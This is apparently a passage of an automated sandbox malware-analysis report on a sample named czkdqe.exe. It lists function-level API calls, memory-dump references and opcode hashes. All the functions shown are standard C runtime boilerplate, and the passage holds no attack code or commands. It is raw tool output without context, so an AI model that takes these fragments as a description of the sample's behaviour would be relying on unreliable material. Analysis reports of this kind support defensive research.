                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,004029B8,004027E8,00401E66), ref: 004029CF
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004029DD
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004029F6
                                                                                    • SetLastError.KERNEL32(00000000,004029B8,004027E8,00401E66), ref: 00402A48
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                                                                                    • Instruction ID: 078a338927bebc8a57084cdf0b2594a36b0b0cb36656b2d2252d312e3d5e2cf0
                                                                                    • Opcode Fuzzy Hash: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                                                                                    • Instruction Fuzzy Hash: FA012832308A119EE63566B9AE8D5AB2F44EB45338B20023FF510755E1EFFD4C01699C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DA6CC159,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FB9
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00404FCB
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FED
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                                                                                    • Instruction ID: f45cf89818bd8daf17f7f5fa5db09656c02fb6dca8b021926776a3611c212177
                                                                                    • Opcode Fuzzy Hash: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                                                                                    • Instruction Fuzzy Hash: 1101A771914626EBDB119F51DC05FAEBBB8FB44715F00493AE811B22D0DBB89900CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 00409B45
                                                                                    • __alloca_probe_16.LIBCMT ref: 00409C0E
                                                                                    • __freea.LIBCMT ref: 00409C75
                                                                                      • Part of subcall function 00407D48: RtlAllocateHeap.NTDLL(00000000,00406E77,?), ref: 00407D7A
                                                                                    • __freea.LIBCMT ref: 00409C88
                                                                                    • __freea.LIBCMT ref: 00409C95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1423051803-0
                                                                                    • Opcode ID: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                                                                                    • Instruction ID: f5d5e5908dbe2b0eece80851408d63fed06286bdfdf7f28fe4aa87bf0313151d
                                                                                    • Opcode Fuzzy Hash: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                                                                                    • Instruction Fuzzy Hash: C351A172A042066FFB209F65CC85EBB36E9EF84714F15453EFC04B6292E638DC109669
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ]A$C:\Users\user\AppData\Local\Temp\czkdqe.exe$hO{
                                                                                    • API String ID: 0-2919004683
                                                                                    • Opcode ID: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                                                                                    • Instruction ID: 516f48771e3ea8525e46061b4c90816104fcc3183a12e04dc85d04e75a492b31
                                                                                    • Opcode Fuzzy Hash: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                                                                                    • Instruction Fuzzy Hash: 0731D6B6A00214BFD711EF95DC819DFBBACEB85354B11847FF605B7281D6388D018B98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx), ref: 00402BF0
                                                                                    • GetLastError.KERNEL32(?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx,00000000,?,00402AB7), ref: 00402BFA
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402C22
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3177248105-2084034818
                                                                                    • Opcode ID: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                                                                                    • Instruction ID: e589de4d7b83ec3a89ad76cef1a63b0294eee27024da7e6f7d3f22e711884464
                                                                                    • Opcode Fuzzy Hash: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                                                                                    • Instruction Fuzzy Hash: 2CE01230644204B6FB111B62EE0AB1E3A54AB10B55F104831F90DB41E1EBF69964899C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(DA6CC159,00000000,00000000,00000008), ref: 00409FF0
                                                                                      • Part of subcall function 00407464: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00409C6B,?,00000000,-00000008), ref: 004074C5
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040A242
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040A288
                                                                                    • GetLastError.KERNEL32 ref: 0040A32B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                    • String ID:
                                                                                    • API String ID: 2112829910-0
                                                                                    • Opcode ID: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                                                                                    • Instruction ID: 286eb15663e9a8c4fe1ad12a89817a662dc5e0061b0541279607a600132331f4
                                                                                    • Opcode Fuzzy Hash: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                                                                                    • Instruction Fuzzy Hash: 47D18BB5D042589FCB14CFA8C8809EDBBB4FF08304F14817AE866FB391D634A956CB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer
                                                                                    • String ID:
                                                                                    • API String ID: 1740715915-0
                                                                                    • Opcode ID: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                                                                                    • Instruction ID: c36bffaf7fe8f9e15fcbe67479aef6d6b820bcd02780ea586b95a92c856a1c7e
                                                                                    • Opcode Fuzzy Hash: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                                                                                    • Instruction Fuzzy Hash: E45103F6600202AFDB299F21C840B6A7BA9EF40B06F14813FE805672D1D739EE41C798
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000), ref: 0040B77D
                                                                                    • GetLastError.KERNEL32(?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008,?,0040A922,00000000), ref: 0040B789
                                                                                      • Part of subcall function 0040B74F: CloseHandle.KERNEL32(FFFFFFFE,0040B799,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008), ref: 0040B75F
                                                                                    • ___initconout.LIBCMT ref: 0040B799
                                                                                      • Part of subcall function 0040B711: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040B740,0040AF0D,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B724
                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B7AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                                                                                    • Instruction ID: 9be2d2e95ebdf4ca364c863a04f8f34c4778b8d92ece9612039581527531bafd
                                                                                    • Opcode Fuzzy Hash: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                                                                                    • Instruction Fuzzy Hash: 72F01236400124BBCF162F96DC049CA3F65EB883B1B008435FA18A6161C7318870DBD8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 00403CB5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EncodePointer
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 2118026453-2084237596
                                                                                    • Opcode ID: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                                                                                    • Instruction ID: 27d9d21774ce73f4523aea127e5a37313707127f13db8d93af602d3374e0ea50
                                                                                    • Opcode Fuzzy Hash: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                                                                                    • Instruction Fuzzy Hash: E9415B72900109EFCF16DF94CE81AEEBBB9BF48305F1840AAF905B7291D3399A50DB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401F5D
                                                                                    • ___raise_securityfailure.LIBCMT ref: 00402045
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                    • String ID: HYA
                                                                                    • API String ID: 3761405300-3949630065
                                                                                    • Opcode ID: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                                                                                    • Instruction ID: 6cb4d069ac1d3707beaa45bb2dd9a615a7934397750866ae2a5b0aac751b91a7
                                                                                    • Opcode Fuzzy Hash: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                                                                                    • Instruction Fuzzy Hash: 662103B56A1A01DBD310DF55F9D6AC43BA0BF88394F50D23AE5098ABB0D3B45880CF4E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%